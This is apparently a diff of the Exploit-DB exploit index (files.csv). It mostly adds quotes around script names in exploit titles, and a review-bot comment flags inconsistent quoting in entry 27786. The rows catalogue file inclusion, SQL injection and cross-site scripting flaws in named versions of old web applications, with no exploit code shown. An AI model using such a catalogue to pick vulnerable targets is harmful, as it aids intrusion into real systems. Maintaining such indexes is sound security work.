+25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - 'Form.Inc.php3' Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0
 25942,platforms/php/webapps/25942.txt,"Jaws 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0
 25945,platforms/php/webapps/25945.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0
 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0
@@ -28677,7 +28681,7 @@ id,file,description,date,author,platform,type,port
 26077,platforms/php/webapps/26077.txt,"Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0
 26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 - Logs Unauthorized Access",2005-08-23,rgod,php,webapps,0
 26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting",2005-09-26,X1ngBox,php,webapps,0
-26079,platforms/php/webapps/26079.txt,"Comdev eCommerce 3.0 - config.php Remote File Inclusion",2005-08-05,anonymous,php,webapps,0
+26079,platforms/php/webapps/26079.txt,"Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion",2005-08-05,anonymous,php,webapps,0
 26080,platforms/php/webapps/26080.txt,"Comdev eCommerce 3.0 - WCE.download.php Directory Traversal",2005-08-05,anonymous,php,webapps,0
 26081,platforms/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - dwt_editor.php Multiple Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0
 26082,platforms/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_newsletter.php' language Parameter Cross-Site Scripting",2005-08-05,Lostmon,php,webapps,0
@@ -28774,14 +28778,14 @@ id,file,description,date,author,platform,type,port
 26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog - Html Injection",2005-08-24,ali202,php,webapps,0
 26199,platforms/php/webapps/26199.txt,"phpMyAdmin 2.x - error.php Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps,0
 26200,platforms/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",php,webapps,0
-26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 - Api.php Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,php,webapps,0
+26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 - 'Api.php' Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,php,webapps,0
 26202,platforms/php/webapps/26202.txt,"Looking Glass - Cross-Site Scripting",2005-08-27,rgod,php,webapps,0
 26203,platforms/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution",2005-08-27,rgod,php,webapps,0
 26204,platforms/php/webapps/26204.pl,"MyBB - member.php SQL Injection",2005-08-29,W7ED,php,webapps,0
 26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - 'index.php' c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0
 26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 - events.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0
 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0
-26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0
+26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0
 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0
 26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0
 26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0
@@ -28884,14 +28888,14 @@ id,file,description,date,author,platform,type,port
 26361,platforms/php/webapps/26361.txt,"MySource 2.14 - edit_table_cell_type_wysiwyg.php Stylesheet Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0
 26362,platforms/php/webapps/26362.txt,"MySource 2.14 - new_upgrade_functions.php Multiple Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
 26363,platforms/php/webapps/26363.txt,"MySource 2.14 - init_mysource.php INCLUDE_PATH Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
-26364,platforms/php/webapps/26364.txt,"MySource 2.14 - Socket.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
-26365,platforms/php/webapps/26365.txt,"MySource 2.14 - Request.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
+26364,platforms/php/webapps/26364.txt,"MySource 2.14 - 'Socket.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
+26365,platforms/php/webapps/26365.txt,"MySource 2.14 - 'Request.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
 26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0
-26369,platforms/php/webapps/26369.txt,"MySource 2.14 - mail.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
-26370,platforms/php/webapps/26370.txt,"MySource 2.14 - Date.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
-26371,platforms/php/webapps/26371.txt,"MySource 2.14 - Span.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
-26372,platforms/php/webapps/26372.txt,"MySource 2.14 - mimeDecode.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
-26373,platforms/php/webapps/26373.txt,"MySource 2.14 - mime.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
+26369,platforms/php/webapps/26369.txt,"MySource 2.14 - 'mail.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
+26370,platforms/php/webapps/26370.txt,"MySource 2.14 - 'Date.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
+26371,platforms/php/webapps/26371.txt,"MySource 2.14 - 'Span.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
+26372,platforms/php/webapps/26372.txt,"MySource 2.14 - 'mimeDecode.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
+26373,platforms/php/webapps/26373.txt,"MySource 2.14 - 'mime.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0
 26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - modules.php Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0
 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum - 'newtopic.php' forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0
 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - quote.php forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0
@@ -28983,7 +28987,7 @@ id,file,description,date,author,platform,type,port
 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0
 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 - 'download.php' File Parameter SQL Injection",2005-11-12,A.1.M,php,webapps,0
 26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel 'Username' SQL Injection",2005-11-12,bhs_team,php,webapps,0
-26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - module.php Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0
+26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0
 26503,platforms/php/webapps/26503.txt,"Wizz Forum - ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0
 26504,platforms/php/webapps/26504.txt,"Wizz Forum - forumreply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0
 26505,platforms/php/webapps/26505.txt,"Codegrrl - Protection.php Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0
@@ -29015,7 +29019,7 @@ id,file,description,date,author,platform,type,port
 26541,platforms/php/webapps/26541.txt,"SimplePoll - results.php SQL Injection",2005-11-21,stranger-killer,php,webapps,0
 26543,platforms/php/webapps/26543.txt,"APBoard - thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0
 26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x - 'files.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0
-26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - Search Module SQL Injection",2005-11-21,Lostmon,php,webapps,0
+26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - (Search Module) SQL Injection",2005-11-21,Lostmon,php,webapps,0
 26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 - profile.php user Parameter Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0
 26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 - mail.php user Parameter Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0
 26549,platforms/php/webapps/26549.txt,"Torrential 1.2 - Getdox.php Directory Traversal",2005-11-22,Shell,php,webapps,0
@@ -29046,7 +29050,7 @@ id,file,description,date,author,platform,type,port
 26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0
 26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - email.php h_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0
 26584,platforms/php/webapps/26584.txt,"vtiger CRM 4.2 Leads Module - record Parameter Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0
-26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 - RSS Aggregation Module Feed Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0
+26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 - (RSS Aggregation Module Feed) Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0
 26586,platforms/php/webapps/26586.txt,"vtiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0
 26587,platforms/php/webapps/26587.txt,"Comdev Vote Caster 3.1 - 'index.php' SQL Injection",2005-11-24,r0t,php,webapps,0
 26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0
@@ -29204,7 +29208,7 @@ id,file,description,date,author,platform,type,port
 26763,platforms/cfm/webapps/26763.txt,"Magic List Pro - view_archive.cfm ListID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0
 26764,platforms/cfm/webapps/26764.txt,"Magic Forum Personal - view_forum.cfm ForumID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0
 26765,platforms/cfm/webapps/26765.txt,"Magic Forum Personal - view_thread.cfm Multiple Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0
-26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 - index.cfm Local File Inclusion",2005-12-08,r0t,cfm,webapps,0
+26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 - 'index.cfm' Local File Inclusion",2005-12-08,r0t,cfm,webapps,0
 26767,platforms/cfm/webapps/26767.txt,"CF_Nuke 4.6 - index.cfm Cross-Site Scripting",2005-12-08,r0t,cfm,webapps,0
 26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 - register.php Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0
 26771,platforms/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation",2005-12-08,"Daniel Fabian",cgi,webapps,0
@@ -29332,7 +29336,7 @@ id,file,description,date,author,platform,type,port
 26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Inclusion",2005-12-20,"Security .Net Information",php,webapps,0
 26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 - Title Parameter Cross-Site Scripting",2005-12-20,$um$id,php,webapps,0
 26920,platforms/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 - CategoryResults.cfm Multiple Parameter SQL Injection",2005-12-20,r0t3d3Vil,cfm,webapps,0
-26921,platforms/php/webapps/26921.txt,"Tolva 0.1 - Usermods.php Remote File Inclusion",2005-12-21,xbefordx,php,webapps,0
+26921,platforms/php/webapps/26921.txt,"Tolva 0.1 - 'Usermods.php' Remote File Inclusion",2005-12-21,xbefordx,php,webapps,0
 26923,platforms/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps,0
 26924,platforms/jsp/webapps/26924.txt,"OpenEdit 4.0 - Results.HTML Cross-Site Scripting",2005-12-21,r0t3d3Vil,jsp,webapps,0
 26925,platforms/php/webapps/26925.txt,"Papaya CMS 4.0.4 - Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0
@@ -29640,7 +29644,7 @@ id,file,description,date,author,platform,type,port
 27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0
 27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0
 27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - Failure.asp Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps,0
-27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 - Scan_Lang_Insert.php Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0
+27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0
 27312,platforms/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",php,webapps,0
 27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 - 'basket.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0
 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0
@@ -29673,7 +29677,7 @@ id,file,description,date,author,platform,type,port
 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0
 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0
 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0
-27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x - Common.php Remote File Inclusion",2006-03-06,ERNE,php,webapps,0
+27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x - 'Common.php' Remote File Inclusion",2006-03-06,ERNE,php,webapps,0
 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0
 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0
 27367,platforms/php/webapps/27367.txt,"Link Bank - Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0
@@ -29841,7 +29845,7 @@ id,file,description,date,author,platform,type,port
 27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php' 'type' Parameter CRLF Injection",2006-04-10,Psych0,php,webapps,0
 27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0
 27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0
-27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - Spip_login.php Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0
+27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0
 27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - modules.php Multiple SQL Injections",2005-04-10,r0t,php,webapps,0
 27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - Load.php Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0
 27592,platforms/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,php,webapps,0
@@ -29885,12 +29889,12 @@ id,file,description,date,author,platform,type,port
 27650,platforms/php/webapps/27650.txt,"Farsinews 2.1/2.5 - 'search.php' Cross-Site Scripting",2006-04-14,"amin emami",php,webapps,0
 27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 - 'index.php' Cross-Site Scripting",2006-04-15,Qex,php,webapps,0
 27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80
-27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 - Common.php Remote File Inclusion",2006-06-05,SpC-x,php,webapps,0
+27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 - 'Common.php' Remote File Inclusion",2006-06-05,SpC-x,php,webapps,0
 27655,platforms/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0
 27656,platforms/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0
 27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 - HTML Injection",2006-04-15,Qex,php,webapps,0
 27659,platforms/php/webapps/27659.txt,"PHPFaber TopSites - 'index.php' Cross-Site Scripting",2006-04-17,botan,php,webapps,0
-27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 - functions.php Remote File Inclusion",2006-04-17,r0t,php,webapps,0
+27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 - 'functions.php' Remote File Inclusion",2006-04-17,r0t,php,webapps,0
 27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,php,webapps,0
 27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 - 'index.php' Local File Inclusion",2006-04-17,"Hamid Ebadi",php,webapps,0
 27663,platforms/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps,0
@@ -29933,7 +29937,7 @@ id,file,description,date,author,platform,type,port
 28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - view_order.php order_id Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0
 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0
 28054,platforms/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0
-27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0
+27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - 'Common.php' Remote File Inclusion",2006-04-20,r0t,php,webapps,0
 27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - 'member.php' Cross-Site Scripting",2006-04-20,Qex,php,webapps,0
 27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0
 27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
@@ -29973,7 +29977,7 @@ id,file,description,date,author,platform,type,port
 27756,platforms/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",hardware,webapps,0
 27757,platforms/asp/webapps/27757.txt,"DUclassified - detail.asp SQL Injection",2006-04-28,sadegh.sarshogh,asp,webapps,0
 27761,platforms/cgi/webapps/27761.txt,"NeoMail - NeoMail.pl sessionid Parameter Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps,0
-27763,platforms/php/webapps/27763.php,"I-RATER Platinum - Config_settings.TPL.php Remote File Inclusion",2006-04-28,O.U.T.L.A.W,php,webapps,0
+27763,platforms/php/webapps/27763.php,"I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion",2006-04-28,O.U.T.L.A.W,php,webapps,0
 27767,platforms/php/webapps/27767.txt,"Artmedic Event - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0
 27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0
 27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod - Weblog_posting.php SQL Injection",2006-04-29,Qex,php,webapps,0
@@ -29984,14 +29988,14 @@ id,file,description,date,author,platform,type,port
 27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0
 27776,platforms/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,linux,webapps,443
 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0
-27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - Addentry.php Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
+27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
 27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0
 27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - 'member.php' sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0
 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0
 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 - BBCode Script Injection",2006-04-29,r0xes,php,webapps,0
 27784,platforms/php/webapps/27784.txt,"PlanetGallery - Gallery_admin.php Authentication Bypass",2006-04-29,tugr@,php,webapps,0
-27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b - Kopf.php Remote File Inclusion",2006-05-01,beford,php,webapps,0
-27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion",2006-05-01,[Oo],php,webapps,0
+27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion",2006-05-01,beford,php,webapps,0
+27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion",2006-05-01,[Oo],php,webapps,0
 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,php,webapps,0
 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 - signup.php referral Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0
 27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 - members.php id Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0
@@ -30042,7 +30046,7 @@ id,file,description,date,author,platform,type,port
 27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
 27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 - showthread.php SQL Injection",2006-05-09,Breeeeh,php,webapps,0
 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - Moreinfo.asp Cross-Site Scripting",2006-05-09,Dj_Eyes,asp,webapps,0
-27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - Session.INC.php Remote File Inclusion",2006-05-09,ReZEN,php,webapps,0
+27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion",2006-05-09,ReZEN,php,webapps,0
 27846,platforms/asp/webapps/27846.txt,"EImagePro - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
 27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0
 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0
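Review bot: In the hunk starting at old line 29984, the new title for entry 27786 puts the word "Mod" inside the file-name quotes (`'Mod KB_constants.php'`), while every other renamed row in this commit quotes only the script name. "Mod" looks like part of the product name rather than the file, so the quoted token would probably be better as `'KB_constants.php'` with "Mod" left outside the quotes. This is inferred from the pattern of the neighbouring rows; confirm against the advisory text in 27786.txt before changing it. Anyone matching this index against an affected file name would otherwise get no hit for this row on an exact quoted-name search.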
@@ -30062,7 +30066,7 @@ id,file,description,date,author,platform,type,port
 27876,platforms/php/webapps/27876.txt,"MusicBox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0
 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0
 27879,platforms/php/webapps/27879.txt,"Joomla! Component 'com_virtuemart' 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0
-27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 - popup.php Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0
+27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0
 27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 - ODP.php Cross-Site Scripting",2006-05-15,Kiki,php,webapps,0
 27883,platforms/php/webapps/27883.txt,"MonoChat 1.0 - HTML Injection",2005-05-15,X-BOY,php,webapps,0
 27884,platforms/php/webapps/27884.txt,"Confixx 3.0/3.1 - 'index.php' Cross-Site Scripting",2006-05-15,LoK-Crew,php,webapps,0
@@ -30096,7 +30100,7 @@ id,file,description,date,author,platform,type,port
 27924,platforms/php/webapps/27924.txt,"ToendaCMS 0.7 - 'index.php' Cross-Site Scripting",2006-05-31,Jokubas,php,webapps,0
 27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - 'index.php' Local File Inclusion",2006-05-31,darkgod,php,webapps,0
 27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Inclusion",2005-05-31,ERNE,php,webapps,0
-27928,platforms/php/webapps/27928.txt,"osTicket 1.x - Open_form.php Remote File Inclusion",2006-05-31,Sweet,php,webapps,0
+27928,platforms/php/webapps/27928.txt,"osTicket 1.x - 'Open_form.php' Remote File Inclusion",2006-05-31,Sweet,php,webapps,0
 27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 - Portal.php SQL Injection",2006-05-31,SpC-x,php,webapps,0
 27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0
 27933,platforms/php/webapps/27933.txt,"Tekno.Portal - Bolum.php SQL Injection",2006-06-01,SpC-x,php,webapps,0
@@ -30109,7 +30113,7 @@ id,file,description,date,author,platform,type,port
 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps,0
 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0
 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
-27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x - Redirect.php Local File Inclusion",2006-06-02,brokejunker,php,webapps,0
+27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion",2006-06-02,brokejunker,php,webapps,0
